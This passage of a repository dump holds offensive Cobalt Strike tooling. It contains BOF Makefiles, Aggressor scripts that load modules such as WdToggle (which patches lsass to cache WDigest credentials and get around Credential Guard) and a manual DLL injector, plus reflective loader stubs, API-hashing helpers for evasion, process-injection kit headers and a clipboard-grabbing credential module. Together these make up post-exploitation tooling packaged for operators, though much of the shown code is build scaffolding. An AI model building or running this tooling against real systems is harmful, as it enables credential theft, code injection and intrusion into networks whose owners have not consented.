$(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/PetitPotam/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/WdToggle/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | # $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | # $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Loader/COFF Loader/Include/utils.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifdef _DEBUG 7 | #define DEBUG_PRINT(x, ...) printf(x, ##__VA_ARGS__) 8 | #else 9 | #define DEBUG_PRINT(x, ...) 10 | #endif 11 | 12 | typedef struct _Arg { 13 | char* value; 14 | size_t size; 15 | BOOL includeSize; 16 | } Arg; 17 | 18 | 19 | void PrintBanner(); 20 | void PrintUsage(char* ExecutableName); 21 | void PackData(Arg* args, size_t numberOfArgs, char** output, size_t* size); 22 | char* ReadFile(char* FilePath, DWORD* FileSize); -------------------------------------------------------------------------------- /Loader/Titan Ldr/asm/x86/Start.asm: -------------------------------------------------------------------------------- 1 | ;; 2 | ;; Reflective Loader 3 | ;; 4 | ;; GuidePoint Security LLC 5 | ;; 6 | ;; Threat and Attack Simulation 7 | ;; 8 | [BITS 32] 9 | 10 | ;; 11 | ;; Import 12 | ;; 13 | EXTERN _Titan 14 | 15 | ;; 16 | ;; Export 17 | ;; 18 | GLOBAL _Start 19 | 20 | [SECTION .text$A] 21 | 22 | _Start: 23 | ;; 24 | ;; Setup stack 25 | ;; 26 | push ebp 27 | mov ebp, esp 28 | 29 | ;; 30 | ;; Execute Ldr 31 | ;; 32 | call _Titan 33 | 34 | ;; 35 | ;; Cleanup stack 36 | ;; 37 | mov esp, ebp 38 | pop ebp 39 | 40 | ;; 41 | ;; Return 42 | ;; 43 | ret 44 | -------------------------------------------------------------------------------- /Profile/Malleable Profiles/sleepmask-vs/BOF-Template/base/helpers.h: -------------------------------------------------------------------------------- 1 | #ifdef __cplusplus 2 | #ifndef _DEBUG 3 | #define DFR(module, function) \ 4 | DECLSPEC_IMPORT decltype(function) module##$##function; 5 | 6 | #define DFR_LOCAL(module, function) \ 7 | DECLSPEC_IMPORT decltype(function) module##$##function; \ 8 | decltype(module##$##function) *##function = module##$##function; 9 | #else 10 | #define DFR_LOCAL(module, function) 11 | #define DFR(module, function) \ 12 | decltype(function) *module##$##function = function; 13 | #endif // end of _DEBUG 14 | #endif // end of __cplusplus -------------------------------------------------------------------------------- /Cobatl Strike/AddMachineAccount/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/CVE-2022-26923/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/StartWebClient/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/shared/config.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define MAGIC "WKLWKL" 4 | #define WM_SET_QUALITY WM_USER + 1 5 | 6 | typedef unsigned int COMPATUINT; 7 | typedef struct __attribute__((packed)) 8 | { 9 | COMPATUINT msg; 10 | COMPATUINT wParam; 11 | COMPATUINT lParam; 12 | } MSGPACKET, *PMSGPACKET; 13 | 14 | enum Connection 15 | { 16 | desktop, 17 | input, 18 | end 19 | }; 20 | 21 | enum Quality 22 | { 23 | QUALITY_LOW = 10, 24 | QUALITY_MEDIUM = 40, 25 | QUALITY_HIGH = 100, 26 | }; 27 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Process Inject Kit/process-inject-explicit/base/helpers.h: -------------------------------------------------------------------------------- 1 | #ifdef __cplusplus 2 | #ifndef _DEBUG 3 | #define DFR(module, function) \ 4 | DECLSPEC_IMPORT decltype(function) module##$##function; 5 | 6 | #define DFR_LOCAL(module, function) \ 7 | DECLSPEC_IMPORT decltype(function) module##$##function; \ 8 | decltype(module##$##function) *##function = module##$##function; 9 | #else 10 | #define DFR_LOCAL(module, function) 11 | #define DFR(module, function) \ 12 | decltype(function) *module##$##function = function; 13 | #endif // end of _DEBUG 14 | #endif // end of __cplusplus -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Process Inject Kit/process-inject-spawn/base/helpers.h: -------------------------------------------------------------------------------- 1 | #ifdef __cplusplus 2 | #ifndef _DEBUG 3 | #define DFR(module, function) \ 4 | DECLSPEC_IMPORT decltype(function) module##$##function; 5 | 6 | #define DFR_LOCAL(module, function) \ 7 | DECLSPEC_IMPORT decltype(function) module##$##function; \ 8 | decltype(module##$##function) *##function = module##$##function; 9 | #else 10 | #define DFR_LOCAL(module, function) 11 | #define DFR(module, function) \ 12 | decltype(function) *module##$##function = function; 13 | #endif // end of _DEBUG 14 | #endif // end of __cplusplus -------------------------------------------------------------------------------- /Cobatl Strike/Winver/Winver.cna: -------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa 2 | #@outflank.nl 3 | 4 | beacon_command_register("Winver", "Display the version of Windows that is running, the build number and patch release (Update Build Revision).", 5 | "Synopsis: Winver\n\n" . 6 | "Display Windows version info.\n\n"); 7 | 8 | alias Winver { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("Winver." . barch($bid) . ".o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | beacon_inline_execute($bid, $data, "go", $null); 17 | } 18 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/bof/main.c: -------------------------------------------------------------------------------- 1 | #include "../common.h" 2 | 3 | VOID go( PVOID Argv, INT Argc ) 4 | { 5 | BAPI_TABLE Api; 6 | 7 | RtlSecureZeroMemory( &Api, sizeof( Api ) ); 8 | Api.BeaconInjectProcess = C_PTR( BeaconInjectProcess ); 9 | Api.BeaconDataExtract = C_PTR( BeaconDataExtract ); 10 | Api.BeaconDataParse = C_PTR( BeaconDataParse ); 11 | Api.BeaconDataShort = C_PTR( BeaconDataShort ); 12 | Api.BeaconIsAdmin = C_PTR( BeaconIsAdmin ); 13 | Api.BeaconPrintf = C_PTR( BeaconPrintf ); 14 | 15 | BofMain( &Api, Argv, Argc ); 16 | }; 17 | -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Tools\cobaltstrike\aggressors\CSSG\assets\Encryptor\bin\Debug\Encryptor.exe 2 | C:\Tools\cobaltstrike\aggressors\CSSG\assets\Encryptor\bin\Debug\Encryptor.pdb 3 | C:\Tools\cobaltstrike\aggressors\CSSG\assets\Encryptor\obj\Debug\Encryptor.csproj.CoreCompileInputs.cache 4 | C:\Tools\cobaltstrike\aggressors\CSSG\assets\Encryptor\obj\Debug\Encryptor.exe 5 | C:\Tools\cobaltstrike\aggressors\CSSG\assets\Encryptor\obj\Debug\Encryptor.pdb 6 | C:\Tools\cobaltstrike\aggressors\CSSG\assets\Encryptor\obj\Debug\Encryptor.csproj.AssemblyReference.cache 7 | -------------------------------------------------------------------------------- /Cobatl Strike/DelFirewallRule/delfirewallrule.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | //RemoveFirewallRule 4 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID pvReserved, DWORD dwCoInit); 5 | DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void); 6 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv); 7 | WINBASEAPI BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR *); 8 | WINBASEAPI void WINAPI OLEAUT32$SysFreeString(BSTR); 9 | WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...); 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor CNA/JuickyPotato_DLL/JuicyPotato/LocalNegotiator.h: -------------------------------------------------------------------------------- 1 | #define SECURITY_WIN32 2 | 3 | #pragma once 4 | #include 5 | #include 6 | class LocalNegotiator 7 | { 8 | public: 9 | LocalNegotiator(); 10 | int handleType1(char* ntlmBytes, int len); 11 | int handleType2(char* ntlmBytes, int len); 12 | int handleType3(char* ntlmBytes, int len); 13 | PCtxtHandle phContext; 14 | int authResult; 15 | 16 | private: 17 | CredHandle hCred; 18 | SecBufferDesc secClientBufferDesc, secServerBufferDesc; 19 | SecBuffer secClientBuffer, secServerBuffer; 20 | }; 21 | 22 | -------------------------------------------------------------------------------- /Cobatl Strike/Beacon Killer/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Threading.Tasks; 5 | using System.Windows.Forms; 6 | 7 | namespace BeaconKiller 8 | { 9 | internal static class Program 10 | { 11 | /// 12 | /// 应用程序的主入口点。 13 | /// 14 | [STAThread] 15 | static void Main() 16 | { 17 | Application.EnableVisualStyles(); 18 | Application.SetCompatibleTextRenderingDefault(false); 19 | Application.Run(new MainForm()); 20 | } 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /Cobatl Strike/Domaininfo/Domaininfo.cna: -------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa 2 | #@outflank.nl 3 | 4 | beacon_command_register("Domaininfo", "Using Active Directory Domain Services to enumerate domain information.", 5 | "Using Active Directory Domain Services to enumerate domain information.\n\n" . 6 | "Synopsis: Domaininfo\n\n"); 7 | 8 | alias Domaininfo { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("Domaininfo." . barch($bid) . ".o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | beacon_inline_execute($bid, $data, "go", $null); 17 | } 18 | -------------------------------------------------------------------------------- /Cobatl Strike/Mory/utils/data2blob.js: -------------------------------------------------------------------------------- 1 | /** 2 | * database64文件格式转换为2进制 3 | * 4 | * @param {[String]} data dataURL 的格式为 “data:image/png;base64,****”,逗号之前都是一些说明性的文字,我们只需要逗号之后的就行了 5 | * @param {[String]} mime [description] 6 | * @return {[blob]} [description] 7 | */ 8 | export default function(data, mime) { 9 | data = data.split(',')[1]; 10 | data = window.atob(data); 11 | var ia = new Uint8Array(data.length); 12 | for (var i = 0; i < data.length; i++) { 13 | ia[i] = data.charCodeAt(i); 14 | }; 15 | // canvas.toDataURL 返回的默认格式就是 image/png 16 | return new Blob([ia], { 17 | type: mime 18 | }); 19 | }; 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/timestamped_activitylog_export.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | #load this script to output all event and activity logs with human-readable timestamp to activitylog.txt in your working directory 3 | 4 | #note: the file save prompt will pop up once for each server you are connected to 5 | 6 | prompt_file_save($null, { 7 | local('$handle'); 8 | $handle = openf(">> $+ $1"); 9 | foreach $key => $value (archives()) 10 | { 11 | println($handle, dstamp($value['when']) . " " . formatDate("z") . "\t" . $value['data'] . "\t" . $value['type']. "\t" . $value['bid']); 12 | } 13 | closef($handle); 14 | }); -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 3/timestamped_activitylog_export.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | #load this script to output all event and activity logs with human-readable timestamp to activitylog.txt in your working directory 3 | 4 | #note: the file save prompt will pop up once for each server you are connected to 5 | 6 | prompt_file_save($null, { 7 | local('$handle'); 8 | $handle = openf(">> $+ $1"); 9 | foreach $key => $value (archives()) 10 | { 11 | println($handle, dstamp($value['when']) . " " . formatDate("z") . "\t" . $value['data'] . "\t" . $value['type']. "\t" . $value['bid']); 12 | } 13 | closef($handle); 14 | }); -------------------------------------------------------------------------------- /Cobatl Strike/bluescreenofjeff/timestamped_activitylog_export.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | #load this script to output all event and activity logs with human-readable timestamp to activitylog.txt in your working directory 3 | 4 | #note: the file save prompt will pop up once for each server you are connected to 5 | 6 | prompt_file_save($null, { 7 | local('$handle'); 8 | $handle = openf(">> $+ $1"); 9 | foreach $key => $value (archives()) 10 | { 11 | println($handle, dstamp($value['when']) . " " . formatDate("z") . "\t" . $value['data'] . "\t" . $value['type']. "\t" . $value['bid']); 12 | } 13 | closef($handle); 14 | }); -------------------------------------------------------------------------------- /Loader/Titan Ldr/asm/x64/Start.asm: -------------------------------------------------------------------------------- 1 | ;; 2 | ;; Reflective Loader 3 | ;; 4 | ;; GuidePoint Security LLC 5 | ;; 6 | ;; Threat and Attack Simulation 7 | ;; 8 | [BITS 64] 9 | 10 | ;; 11 | ;; Import 12 | ;; 13 | EXTERN Titan 14 | 15 | ;; 16 | ;; Export 17 | ;; 18 | GLOBAL Start 19 | 20 | [SECTION .text$A] 21 | 22 | Start: 23 | ;; 24 | ;; Setup stack 25 | ;; 26 | push rsi 27 | mov rsi, rsp 28 | and rsp, 0FFFFFFFFFFFFFFF0h 29 | 30 | ;; 31 | ;; Execute Ldr 32 | ;; 33 | sub rsp, 020h 34 | call Titan 35 | 36 | ;; 37 | ;; Cleanup stack 38 | ;; 39 | mov rsp, rsi 40 | pop rsi 41 | 42 | ;; 43 | ;; Return 44 | ;; 45 | ret 46 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/scripts/hashstring.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | # https://github.com/realoriginal/titanldr-ng/blob/master/python3/hashstring.py 5 | 6 | import sys 7 | 8 | def hash_string( string ): 9 | try: 10 | hash = 5381 11 | 12 | for x in string.upper(): 13 | hash = (( hash << 5 ) + hash ) + ord(x) 14 | 15 | return hash & 0xFFFFFFFF 16 | except: 17 | pass 18 | 19 | if __name__ in '__main__': 20 | try: 21 | print('0x%x' % hash_string(sys.argv[1])); 22 | except IndexError: 23 | print('usage: %s [string]' % sys.argv[0]); 24 | -------------------------------------------------------------------------------- /Cobatl Strike/BOF DLL Inject/inject.cna: -------------------------------------------------------------------------------- 1 | alias mandllinject { 2 | local('$handle $data $args $fileData'); 3 | 4 | # figure out the arch of this session 5 | $barch = barch($1); 6 | 7 | # read in the right BOF file 8 | $handle = openf(script_resource("inject.o")); 9 | $data = readb($handle, -1); 10 | closef($handle); 11 | 12 | $dll_handle = openf($2); 13 | $file_data = readb($dll_handle, -1); 14 | closef($dll_handle); 15 | 16 | # pack our arguments 17 | $args = bof_pack($1, "bi", $file_data, $3); 18 | 19 | btask($1, "Manual DLL Inject - @tomcarver_"); 20 | 21 | # execute it. 22 | beacon_inline_execute($1, $data, "go", $args); 23 | } -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/CSSG_load.cna: -------------------------------------------------------------------------------- 1 | # CSSG Cobalt Strike Shellcode Generator 2 | # Inspired by @offsec_ginger https://github.com/offsecginger/AggressorScripts 3 | # 4 | # Shellcode Generator 5 | # 6 | # Add "Shellcode" top menubar button, "Shellcode Generator" submenu item, and load shellcode_generator.cna on click 7 | 8 | # Location of shellcode generator cna 9 | $SCGEN = "/scripts/shellcode_generator.cna"; 10 | 11 | menubar("Shellcode", "shellcodegen", 2); 12 | popup shellcodegen { 13 | 14 | item "&Shellcode Generator" { 15 | @aggressor = script_resource(($SCGEN).""); 16 | println(@aggressor); 17 | include(@aggressor); 18 | } 19 | 20 | } 21 | -------------------------------------------------------------------------------- /Cobatl Strike/WdToggle/WdToggle.cna: -------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa 2 | #@outflank.nl 3 | 4 | beacon_command_register("WdToggle", "Patch lsass to enable WDigest credential caching and to circumvent Credential Guard (if enabled).", 5 | "Synopsis: WdToggle\n\n" . 6 | "Enable WDigest credential caching and circumvent Credential Guard (if enabled).\n\n"); 7 | 8 | alias WdToggle { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("WdToggle." . barch($bid) . ".o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | beacon_inline_execute($bid, $data, "go", $null); 17 | } 18 | -------------------------------------------------------------------------------- /Cobatl Strike/IdleTime/idletime.cna: -------------------------------------------------------------------------------- 1 | # author REDMED-X 2 | 3 | beacon_command_register( 4 | "idletime", "Check current user activity based on the user's last input", 5 | "INFO:\nCheck current user activity based on the user's last input. Returns the time in format HH:MM:SS.\n\n" . 6 | "USAGE:\nidletime\n\n"); 7 | 8 | alias idletime { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("idletime.o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | blog($bid, "Tasked to check user activity.."); 17 | beacon_inline_execute($bid, $data, "go", $null); 18 | } 19 | -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/tools/test.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | port=5912 4 | host="localhost" 5 | 6 | cnt=$1 7 | 8 | [ -n "$cnt" ] || cnt=100 9 | 10 | i=0 11 | 12 | gen_mac() { 13 | m1=$(date +%s%N | md5sum | head -c 2) 14 | m2=$(date +%s%N | md5sum | head -c 2) 15 | m3=$(date +%s%N | md5sum | head -c 2) 16 | m4=$(date +%s%N | md5sum | head -c 2) 17 | m5=$(date +%s%N | md5sum | head -c 2) 18 | m6=$(date +%s%N | md5sum | head -c 2) 19 | 20 | echo "$m1$m2$m3$m4$m5$m6" | tr '[:lower:]' '[:upper:]' 21 | } 22 | 23 | while [ $i -ne $cnt ] 24 | do 25 | rtty -I "$(gen_mac)" -d "$(date +%s%N | md5sum | head -c 20)" -h $host -p $port & 26 | i=$((i+1)) 27 | done 28 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumDrives/enumdrives.cna: -------------------------------------------------------------------------------- 1 | # author REDMED-X 2 | 3 | beacon_command_register( 4 | "enumdrives", "Enumerate drive letters and its type.", 5 | "INFO:\nEnumerate drive letters and its type.\n\n" . 6 | "USAGE:\nenumdrives\n\n"); 7 | 8 | alias enumdrives { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("enumdrives.o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | $arg_data = bof_pack($bid); 17 | 18 | blog($bid, "Tasked to enumerate drive letters and its type.."); 19 | beacon_inline_execute($bid, $data, "go", $arg_data); 20 | } 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /Cobatl Strike/Portscan BOF/src/trustedsec-bof-print.h: -------------------------------------------------------------------------------- 1 | WINBASEAPI void *__cdecl MSVCRT$calloc(size_t number, size_t size); 2 | WINBASEAPI int WINAPI MSVCRT$vsnprintf(char* buffer, size_t count, const char* format, va_list arg); 3 | WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count); 4 | WINBASEAPI void* WINAPI MSVCRT$memcpy(void* dest, const void* src, size_t count); 5 | WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(); 6 | WINBASEAPI LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 7 | WINBASEAPI void __cdecl MSVCRT$free(void *memblock); 8 | WINBASEAPI BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID); 9 | 10 | 11 | -------------------------------------------------------------------------------- /Loader/AceLdr/scripts/hashstring.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | # 5 | # https://github.com/SecIdiot/TitanLdr/blob/master/python3/hashstring.py 6 | # 7 | 8 | import sys 9 | 10 | def hash_string( string ): 11 | try: 12 | hash = 5381 13 | 14 | for x in string.upper(): 15 | hash = (( hash << 5 ) + hash ) + ord(x) 16 | 17 | return hash & 0xFFFFFFFF 18 | except: 19 | pass 20 | 21 | if __name__ in '__main__': 22 | try: 23 | print('0x%x' % hash_string(sys.argv[1])); 24 | except IndexError: 25 | print('usage: %s [string]' % sys.argv[0]); 26 | -------------------------------------------------------------------------------- /Cobatl Strike/AddFirewallRule/addfirewallrule.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | //AddFirewallRule 4 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID pvReserved, DWORD dwCoInit); 5 | DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void); 6 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv); 7 | WINBASEAPI BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR *); 8 | WINBASEAPI void WINAPI OLEAUT32$SysFreeString(BSTR); 9 | WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...); 10 | WINBASEAPI int __cdecl MSVCRT$strcmp(const char *str1, const char *str2); 11 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Inject Kit/KIT/TartarusGate/Makefile: -------------------------------------------------------------------------------- 1 | # Makefile 2 | 3 | # Variables 4 | SRC_DIR := src 5 | BUILD_DIR := bin 6 | TARGET_ARCH := x86_64-w64-mingw32 7 | CFLAGS := -masm=intel 8 | 9 | # Source files 10 | SOURCES := process_inject_spawn.c process_inject_explicit.c 11 | 12 | # Object files 13 | OBJECTS := $(SOURCES:%.c=$(BUILD_DIR)/%.x64.o) 14 | 15 | # Default rule 16 | all: $(OBJECTS) 17 | 18 | # Rule for building .o files from .c files 19 | $(BUILD_DIR)/%.x64.o: $(SRC_DIR)/%.c 20 | @echo "Compile $<" 21 | @mkdir -p $(BUILD_DIR) 22 | @$(TARGET_ARCH)-gcc -c $< -o $@ $(CFLAGS) 23 | 24 | # Clean rule 25 | clean: 26 | @rm -rf $(BUILD_DIR)/*.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Dazzle UP/dazzleUP/headers/misconf_checks/path_dll_hijack.h: -------------------------------------------------------------------------------- 1 | void pathDLLHijack() { 2 | std::cout << "\n\n[*] Checking values of %PATH% for DLL Hijack...\n\n"; 3 | 4 | const DWORD buffSize = 65535; 5 | static char buffer[buffSize]; 6 | GetEnvironmentVariableA("Path", buffer, buffSize); 7 | 8 | std::string pathVar = buffer; 9 | std::string delimiter = ";"; 10 | std::vector pathVector = strSplit(pathVar, ';'); 11 | 12 | for (auto path : pathVector) { 13 | if (HasPermissionF(path, GENERIC_WRITE)) { 14 | std::cout << "\tWritable: " << path << "\n"; 15 | } 16 | } 17 | 18 | } -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/helper/hasher.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | def RSHasher(api_name: str) -> int: 4 | a = 87621 5 | b = 316469 6 | h = 0 7 | for c in api_name.encode("utf-8"): 8 | h = h * a + c 9 | a = a * b 10 | return h & 0xFFFFFFFF # keep it 32-bit 11 | 12 | def main(): 13 | if len(sys.argv) < 2: 14 | print("Usage: python hasher.py ...") 15 | sys.exit(1) 16 | 17 | for api_name in sys.argv[1:]: 18 | hash_val = RSHasher(api_name) 19 | print(f"{api_name:<20} -> 0x{hash_val:08X}\n----------------------------------") 20 | 21 | if __name__ == "__main__": 22 | main() 23 | -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/cred_access/clipboard_grab/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.x64.o, $(SRC)) 3 | CC_x64 := x86_64-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | 6 | # Critical BOF compilation flags 7 | CFLAGS := -c -Os -fno-builtin -fno-builtin-memset -fno-builtin-memcpy -fno-builtin-memmove 8 | CFLAGS += -fno-asynchronous-unwind-tables -fno-unwind-tables 9 | CFLAGS += -fno-stack-protector -fno-stack-check -mno-stack-arg-probe 10 | CFLAGS += -nostdlib -ffunction-sections -fdata-sections 11 | 12 | all: $(OBJS) 13 | 14 | %.x64.o: %.c 15 | $(CC_x64) $(CFLAGS) -o $@ $< 16 | $(STRIP_x64) --strip-unneeded $@ 17 | 18 | clean: 19 | rm -f *.o *.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Psk/Psk.cna: -------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa 2 | #@outflank.nl 3 | 4 | #register help 5 | beacon_command_register("psk", "Show detailed information from the windows kernel and loaded driver modules.", 6 | "Synopsis: psk\n\n" . 7 | "Shows a detailed list of the windows kernel and all loaded kernel modules.\n"); 8 | 9 | alias psk { 10 | $bid = $1; 11 | 12 | # Read in the right BOF file 13 | $handle = openf(script_resource("Psk." . barch($bid) . ".o")); 14 | $data = readb($handle, -1); 15 | closef($handle); 16 | 17 | blog($bid, "Enumerating the windows kernel and loaded driver modules."); 18 | beacon_inline_execute($bid, $data, "go", $null); 19 | } 20 | -------------------------------------------------------------------------------- /Cobatl Strike/SystemInfo/systeminfo.cna: -------------------------------------------------------------------------------- 1 | # author REDMED-X 2 | 3 | beacon_command_register( 4 | "systeminfo", "Enumerate system information.", 5 | "INFO:\nEnumerate system information via WMI.\n\n" . 6 | "USAGE:\nsysteminfo\n\n"); 7 | 8 | alias systeminfo { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("systeminfo.o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | $arg_data = bof_pack($bid); 17 | 18 | blog($bid, "Tasked to connect to ROOT\\CIMV2 to fetch system information.."); 19 | beacon_inline_execute($bid, $data, "go", $arg_data); 20 | 21 | } 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /Loader/Titan 